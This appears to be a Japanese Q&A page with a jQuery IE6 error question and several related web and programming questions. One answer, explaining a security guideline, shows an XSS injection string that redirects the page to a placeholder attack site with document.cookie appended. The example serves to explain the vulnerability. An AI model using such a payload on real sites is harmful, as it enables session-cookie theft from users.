jQuery にて初のサイト構築に試みたのですが、

<script type="text/javascript">
(function() {
$.mailbox();
})(jQuery);
</script>

↑の記述だと IE6 の場合のみ
『オブジェクトでサポートされていないプロパティまたはメソッドです。』
とエラーが帰ってきてしまいます。

どうかご教授願います。宜しくお願い致します。

このQ&Aに関連する最新のQ&A

A 回答 (1件)

jQueryの中に


mailboxなどという関数はありませんが・・・。

IEの場合のみというのは、恐らくエラーが表示されていないだけで、Firefoxでもエラーが確認いたしました。
    • good
    • 0

このQ&Aに関連する人気のQ&A

お探しのQ&Aが見つからない時は、教えて!gooで質問しましょう!

このQ&Aを見た人が検索しているワード

このQ&Aと関連する良く見られている質問

Qワープロに貼り付いた画像のトリミングがしたい

ワープロ(Word等)に貼り付いている画像をトリミングしたいのですが、photoshop等の画像編集ソフトに取り込まずに編集する方法はないものでしょうか?

(質問した理由)
ワープロ上でオブジェクトになっている画像を編集するために一旦、別の画像編集ソフトにコピー等で取り込むと画質が落ちてしまいます。画質を落とさずに何とかトリミングしたいのです。(やりたいのはトリミングだけです)

(環境)
ワープロ:Word2002(Windows XP)
画像:JPEG
いつも使っている画像編集ソフト:Photoshop7.0

Aベストアンサー

矩形のトリミングでいいのなら,
図形を選んで右クリックの「図の書式設定」
の「図」のなかに,ズバリ「トリミング」が
あります。mm単位で指定します。

Q 内に書くことはできません」

元アルバイト先に頼まれてサイトを作り運営しているのですが、わからないことがあるので教えて下さい。

サイトはXHTML1.0 Transitional で作っており、ここに、http://fmono.sub.jp/ の「w3Analyzer」を組み込みアクセス解析をしています。サイト自体もこのアクセス解析も正常に動作しています。
ただ、このサイトをhttp://openlab.ring.gr.jp/k16/htmllint/htmllint.htmlで構文チェックすると、アクセス解析のタグにエラー「<img>を~行目の<script>~</script>内に書くことはできません。」が表示されてしまいます。
エラーが表示されるタグは下記のようなものです。

<script type="text/javascript">
document.write('<img src="http://~/w3a/writelog.php?ref='+document.referrer+'" width="1" height="1" />');
</script> >

アクセスログは普通に取得できているので問題ないのですが、もし上記エラーを回避する方法があればご教授下さい。よろしくお願いします。

元アルバイト先に頼まれてサイトを作り運営しているのですが、わからないことがあるので教えて下さい。

サイトはXHTML1.0 Transitional で作っており、ここに、http://fmono.sub.jp/ の「w3Analyzer」を組み込みアクセス解析をしています。サイト自体もこのアクセス解析も正常に動作しています。
ただ、このサイトをhttp://openlab.ring.gr.jp/k16/htmllint/htmllint.htmlで構文チェックすると、アクセス解析のタグにエラー「<img>を~行目の<script>~</script>内に書くことはできません。」が表示されてし...続きを読む

Aベストアンサー

XHTML には「ホンモノの XHTML」と「ニセモノの XHTML」があります。「ホンモノの XHTML」とは application/xml または application/xhtml+xml として識別されるもの、「ニセモノの XHTML」は text/html で識別されるものです。

※実際にはどちらも本物です。ここでは「HTML 互換として処理される XHTML」を「ニセモノ」、「XML として解析される XHTML」を「ホンモノ」と、カタカナ&カッコ付きで書いています。

「ホンモノの XHTML」として見れば、質問文のソースは妥当性違反です。なぜなら、img 要素のタグがエスケープされていないため、これがスクリプトの一部ではなく文書構成要素だと判断されるからです。XHTML 1.0 のスキーマは、script 要素内に img 要素が出現することを許していません。もちろん、スクリプトとしても正しく動作しません。

従って、XML のルールに従ってエスケープする必要があります。特に「<」と「&」は必ずエスケープしなければなりません。

document.write('&lt;img .... />');

ですが面倒なことに、「ニセモノの XHTML」ではこれが動作しなくなります。「ニセモノの XHTML」は、HTML との互換性のために script 要素内の「<」「&」をうまく扱ってくれるのですが、それが仇となり、上記では「&lt;」が「<」に戻りません。

ならば、コメント区間にするのはどうでしょう。XML でもコメント内なら「<」「&」が現れても大丈夫です(ただし「--」だけは駄目です)。

<script type="text/javascript"><!--
document.write('<img .... />');
//--></script>

「ニセモノの XHTML」ならこれでも構いません。しかし、「ホンモノの XHTML」では、コメントは本当に破棄されてしまい、上記では動作すらしなくなります。

そこで、XML/HTML のルールを使わず、JavaScript のルールでエスケープすることを考えます。

document.write('\u003Cimg .... />');

これなら大丈夫でしょう。XML/HTML に限らず、言語が混在する際は必ず適切なエスケープを施す必要があります。エスケープを避けたければ外部スクリプトにして下さい。


なお、ここには別の問題があります。そもそも「ホンモノの XHTML」では、document.write を使用できません。これは HTML 互換の機能だからです(HTML5 に明記されています)。

XHTML を採用するのであれば、それが「ホンモノ」でも「ニセモノ」でも大丈夫なよう、document.write に頼らないコードを作成して下さい。あるいは try...catch で括るなどして、「ニセモノ」として処理されたときのみコードが動作するよう工夫して下さい。あるいはいっそ、XHTML を止めるのも 1 つの選択でしょう。

XHTML には「ホンモノの XHTML」と「ニセモノの XHTML」があります。「ホンモノの XHTML」とは application/xml または application/xhtml+xml として識別されるもの、「ニセモノの XHTML」は text/html で識別されるものです。

※実際にはどちらも本物です。ここでは「HTML 互換として処理される XHTML」を「ニセモノ」、「XML として解析される XHTML」を「ホンモノ」と、カタカナ&カッコ付きで書いています。

「ホンモノの XHTML」として見れば、質問文のソースは妥当性違反です。なぜなら、img 要素のタ...続きを読む

Q描画オブジェクト内の図のトリミング

Word2002を使用しています。
描画オブジェクト内の図を正確にトリミングしたいのですが、マウスでトリミングはできても図の書式設定でトリミング範囲を数値で指定できません。
今は描画オブジェクトから出してからトリミングしてますが、他に良い方法はありませんか。また、これはWordの最新ver.では改善されているのでしょうか?
回答よろしくお願いします。

Aベストアンサー

Word2003 2007beta2 でも描画キャンパス内では
図の書式設定-図タブ-トリミング範囲 の項目は
グレーアウトしてしまいますね。

Q内のコードの抽出方法

Ajaxで読み込んだHTML文書内にあるスクリプトのコードだけを
抽出したいのですが、正規表現を教えてください。
自分で考えてみたものは、以下の方法です。
これが最良なのかわかりません。
「スクリプトは複数箇所に存在しない」という条件で構いません。
宜しくお願いします。

var HTML = 'ここにHTML';
HTML.match(/.*<script.*>([\w\W]*)<\/script>.*/);
scr = RegExp.$1;
eval(scr);

Aベストアンサー

>改行が
ああそうか・・・ mフラグ付けると どう?
ダメなら [\s\S]* とか使う事になると思うけど・・・

Qワード2007 Microsoft Office Word 文書 オブジェクトで張り付けた図のトリミング

ワード2007
表をコピーし、別のWord文書に形式を選択貼り付けで「Microsoft Office Word 文書 オブジェクト」により貼り付けると小さい表でも空白部分ができて行の端から端までに張り付けられてしまいます。
空白部分をトリミングしたいのですが貼り付けた図を選択しても「図ツール」が出てきません。
トリミングする方法を大至急教えて下さい。

Aベストアンサー

クイックアクセスツールバーのカスタマイズから「トリミング」を登録してご使用ください。

「クイックアクセスツールバー」
http://www.becoolusers.com/office/quick-access.html

Q 要素の内

▽安全なウェブサイトの作り方
  http://www.ipa.go.jp/security/vuln/documents/website_security.pdf

><script>...</script> 要素の内容を動的に生成しない
>ウェブページに出力する<script>...</script>要素の内容が、外部からの入力に依存する形で動的に生成される場合、任意のスクリプトが埋め込まれてしまう可能性があります

・P25で上記のように書かれているのですが、理解できません(何故ここだけ動的生成してはいけないのか等)
・具体的にどのようにして埋め込まれる恐れがあるのでしょうか?
・またここで書いている内容は、下記何れを指しているのでしょうか?
・ココカラ<script>...</script>ココマデ
・<script>ココカラ...ココマデ</script>

Aベストアンサー

攻撃の容易性でしょう。

この脆弱性を付く攻撃をする際に一番苦労するのが <script> をどうやって埋め込むかです。これは入力内容のエスケープ処理で大体は塞がれてしまうのですが、<script> 要素内に直接埋めこめられるならその問題が無いので、かなり攻撃しやすいサイトとなります。

埋め込み方法ですが、以下の様な生成をするサイトの場合なら

入力内容: 太郎
出力内容: <script>alert('こんにちは太郎さん')</script>

そのサイト内で使用している cookie 内容を盗聴するために、以下のように攻撃できます。

入力内容: ');window.location='http://攻撃サイト/'+document.cookie;a=('
出力内容: <script>alert('こんにちは');window.location='http://攻撃サイト/'+document.cookie;a=('さん')</script>

引用符のエスケープ処理で塞がれるかもしれませんが、それでも対処できる余地はあります。

QC# 画像のトリミング処理

C#の課題で画像のトリミング処理を行いたいのですが、
どういった処理を行えばいいのか分かりません。

ネットでもいろいろ調べてみたのですが、
Picturebox上に表示させる画像のトリミング方法は見つかっても、
画像そのものにトリミング処理を行う方法は載っていませんでした。

上記のソースを参考にして、
Pictureboxをプリントスクリーンで撮って保存するやり方も試してみたのですが、Pictureboxよりも大きな画像(パソコンの解像度ぎりぎり)の処理で上手くいきません。


C#のソースプログラムでは
画像そのものに直接手を加える形でのトリミング処理は出来ないのでしょうか?

Aベストアンサー

 こんばんは。
 元画像のトリミング領域を元に、トリミングされた画像を作り出して、ピクチャボックスに設定するといった具合ではないでしょうか。
 例えば、元画像が640x480で、(320, 240, 100, 100)の領域を切り取りたければ、新しい画像を100x100で作成して、元画像の領域(320, 240, 100, 100)を、新しい画像の領域(0, 0, 100, 100)に向かって複写します。
 以後、新しい画像の方をピクチャボックスに設定します。
 以下ではディスプレイのスクリーンショットを撮って、(320, 240, 100, 100)の領域を切り抜きます。参考程度で。

private void Form1_Load(object sender, EventArgs e)
{
//スクリーンショット用の画像を作成(元となる絵、ファイルから読み込んで来ても良い)
Bitmap screenShot =
new Bitmap(Screen.PrimaryScreen.Bounds.Width,
Screen.PrimaryScreen.Bounds.Height,
System.Drawing.Imaging.PixelFormat.Format32bppRgb);

//スクリーンショットを撮る
Graphics gfxScreen = Graphics.FromImage(screenShot);
gfxScreen.CopyFromScreen(0, 0, 0, 0, Screen.PrimaryScreen.Bounds.Size, CopyPixelOperation.SourceCopy);
gfxScreen.Dispose();

//トリミング画像を作成
Bitmap trim = new Bitmap(100, 100, System.Drawing.Imaging.PixelFormat.Format32bppRgb);
Graphics gfxTrim = Graphics.FromImage(trim);

//スクリーンショットの領域(320, 240, 100, 100)をトリミング画像の領域(0, 0, 100, 100)に複写
gfxTrim.DrawImage(screenShot, 0, 0, new Rectangle(320, 240, trim.Width, trim.Height), System.Drawing.GraphicsUnit.Pixel);
gfxTrim.Dispose();

//トリミング画像をピクチャボックスに設定する
this.pictureBox1.Image = trim;
this.pictureBox1.Invalidate();
}

 こんばんは。
 元画像のトリミング領域を元に、トリミングされた画像を作り出して、ピクチャボックスに設定するといった具合ではないでしょうか。
 例えば、元画像が640x480で、(320, 240, 100, 100)の領域を切り取りたければ、新しい画像を100x100で作成して、元画像の領域(320, 240, 100, 100)を、新しい画像の領域(0, 0, 100, 100)に向かって複写します。
 以後、新しい画像の方をピクチャボックスに設定します。
 以下ではディスプレイのスクリーンショットを撮って、(320, 240, 100, 100)の領域を...続きを読む

Q【jQuery】で表示が違う

よろしくお願いします。
jQueryで、<a>タグと<area>タグで表示が違ってしまいます。

http://colorpowered.com/colorbox/core/example2/index.html
上記ページの「Fade Transition」というjQueryを使ってみたのですが、

<a href="○○.jpg" rel="example2" title="タイトル">文字</a>ではうまく表示できました。
<a href="○○.jpg" rel="example2" title="タイトル"><img src="□□.jpg" width="100" height="100" /></a>でもうまく表示できました。
クリッカブルマップを使って、画像の一部だけリンクさせる場合がうまくいきません・・。

<area shape="poly" coords="14,33,33,-4,57,0,63,29,46,64,30,66" href="○○.jpg" rel="example2" title="タイトル" accesskey="A" />

上記のように記述した場合、クリッカブルマップはうまく動いて、jQueryも一応表示されるのですが、
左上の ←→× (prev、next、close)ボタンがうまくいかないのです・・・。
添付画像のように、
・prev、nextの矢印は表示されません。
・「前へ」、「次へ」の動きもしません。
・closeの×ボタンは表示されるのですが、何回かクリックしないと閉じません。

CSSはこれで、 http://colorpowered.com/colorbox/core/example2/colorbox.css
jsはこれです。 http://colorpowered.com/colorbox/core/colorbox/jquery.colorbox.js

多分jsの方の記述に修正が必要なのかなと思っているのですが、
もしわかる方いらっしゃいましたら、教えていただきたいと思います。
jQuery初心者で恐縮なのですが、よろしくお願いいたします。

よろしくお願いします。
jQueryで、<a>タグと<area>タグで表示が違ってしまいます。

http://colorpowered.com/colorbox/core/example2/index.html
上記ページの「Fade Transition」というjQueryを使ってみたのですが、

<a href="○○.jpg" rel="example2" title="タイトル">文字</a>ではうまく表示できました。
<a href="○○.jpg" rel="example2" title="タイトル"><img src="□□.jpg" width="100" height="100" /></a>でもうまく表示できました。
クリッカブルマップを使って、画像の一部だけリンクさせる場合がう...続きを読む

Aベストアンサー

>> No.1 お礼

http://colorpowered.com/colorbox/

$(document).ready(function(){
//Examples of how to assign the ColorBox event to elements
$("a[rel='example1']").colorbox();
...
});

No.1で提示したコードはjsファイルではなく、htmlに記述されているこの部分のことです。

<map id="map1" name="map1">
<area ...>
...
</map>

id属性に"map1"を持つmap要素が内包するarea要素すべてがグループ化されます。

$(document).ready(function(){
$('#map1 area').colorbox({ rel: 'area1', transition: 'fade' });
});

Qトリミングした画像で

集合写真を自分の顔だけトリミングした画像を送ったのですが、
元の画像(他の人も写ってる)が見れるというのですが、
トリミングした画像から元の画像に復元する方法ってあるんですか?

Aベストアンサー

言葉足らずでしたが、もう少し詳しくというのはPCでどんなソフトを使ってどのようにつくり、どのような形で保存したのかをお聞きしたかったのです。
たとえば、フリーソフトのJtrimを使って、自分の部分だけを切り抜いて別の名前で保存した・・・とかです。

> PCでトリミングした画像を自分の携帯に送って、それを他人の携帯に転送したのですが、
> その相手には他の人も見えるというのです。
> だけど、自分の携帯に送った画像は自分しか写ってなかったのに転送した画像に他の人が写っていた

たしかにトリミングして切り抜いた画像をPCから自分のケイタイに送って、それの中身を確認して相手に送ったら、相手の方は”周りが見えた”というのは、あり得ないハナシだと思いますよ。
実際に見せて貰ったのですか。
または、そのまま再転送してもらって確認されたらいかがでしょう。

相手の方は、ケイタイからPCに送って、何らかの手段を講じて見たということなのでしょうか?
ちょっと考えにくい話ですね。

QjQuery要素 + タグの追加

絞り込みのボタン部分をセレクトタグにしたいのですが、
どなたかわかる方がいましたら教えてください。


<↓下記のようなセレクトタグを追加したいです>
---------------------------------------------
<select>
<option value="javascript:refresh();">全て</option>
<option value="">イヌ</option>
<option value="">ネコ</option>
<option value="">トリ</option>
</select>
---------------------------------------------


<script type="text/javascript" src="http://www.google.com/jsapi"></script>
<script type="text/javascript">google.load("jquery", "1.7");</script>
<script type="text/javascript">

$(function() {
$("#tags span").click(function() {
var tags = $(this).attr('id');
$("#tags span").removeClass('select');
$(this).addClass('select');
$("#animal div").hide();
if(tags == 'dogs') {
$("#animal .dog").show();
} else if(tags == 'cats') {
$("#animal .cat").show();
} else if(tags == 'birds') {
$("#animal .bird").show();
} else {
$("#animal div").show();
}
});
});
</script>

<div id="tags">
<span class="select"><button>全て</button></span>
<span id="dogs"><button>イヌ</button></span>
<span id="cats"><button>ネコ</button></span>
<span id="birds"><button>トリ</button></span>
</div>

<div id="animal">
<div class="cat"><img src="http://www.finefinefine.jp/wp/sample/images/cat1.jpg"/alt="写真" width="250" height="188"></div>
<div class="dog"><img src="http://www.finefinefine.jp/wp/sample/images/dog1.jpg"/alt="写真" width="250" height="188"></div>
<div class="bird"><img src="http://www.finefinefine.jp/wp/sample/images/bird1.jpg"/alt="写真" width="250" height="188"></div>
<div class="dog"><img src="http://www.finefinefine.jp/wp/sample/images/dog2.jpg"/alt="写真" width="250" height="188"></div>
<div class="bird"><img src="http://www.finefinefine.jp/wp/sample/images/bird2.jpg"/alt="写真" width="250" height="188"></div>
<div class="cat"><img src="http://www.finefinefine.jp/wp/sample/images/cat2.jpg"/alt="写真" width="250" height="188"></div>
<div class="bird"><img src="http://www.finefinefine.jp/wp/sample/images/bird3.jpg"/alt="写真" width="250" height="188"></div>
<div class="cat"><img src="http://www.finefinefine.jp/wp/sample/images/cat3.jpg"/alt="写真" width="250" height="188"></div>
<div class="dog"><img src="http://www.finefinefine.jp/wp/sample/images/dog3.jpg"/alt="写真" width="250" height="188"></div>
<div class="cat"><img src="http://www.finefinefine.jp/wp/sample/images/cat4.jpg"/alt="写真" width="250" height="188"></div>
<div class="bird"><img src="http://www.finefinefine.jp/wp/sample/images/bird4.jpg"/alt="写真" width="250" height="188"></div>
</div>

絞り込みのボタン部分をセレクトタグにしたいのですが、
どなたかわかる方がいましたら教えてください。


<↓下記のようなセレクトタグを追加したいです>
---------------------------------------------
<select>
<option value="javascript:refresh();">全て</option>
<option value="">イヌ</option>
<option value="">ネコ</option>
<option value="">トリ</option>
</select>
---------------------------------------------


<script type="text/javascript" src="http://www.google.com/...続きを読む

Aベストアンサー

こんな感じでどうぞ

$(function() {
$("#selects").change(function() {
var tags = $(this + 'option:selected').val();
$("#animal div").hide();
if(tags == 'dogs') {
$("#animal .dog").show();
} else if(tags == 'cats') {
$("#animal .cat").show();
} else if(tags == 'birds') {
$("#animal .bird").show();
} else {
$("#animal div").show();
}
});
});
</script>

<select id="selects">
<option value="all">全て</option>
<option value="dogs">イヌ</option>
<option value="cats">ネコ</option>
<option value="birds">トリ</option>
</select>

こんな感じでどうぞ

$(function() {
$("#selects").change(function() {
var tags = $(this + 'option:selected').val();
$("#animal div").hide();
if(tags == 'dogs') {
$("#animal .dog").show();
} else if(tags == 'cats') {
$("#animal .cat").show();
} else if(tags == 'birds') {
$("#animal .bird").show();
} else {
$("#animal div").show();
}
});
});
</script>

<select id="selects">
<option value="all">全て</option>
<option value="dogs">イヌ</option>
<option valu...続きを読む


人気Q&Aランキング

おすすめ情報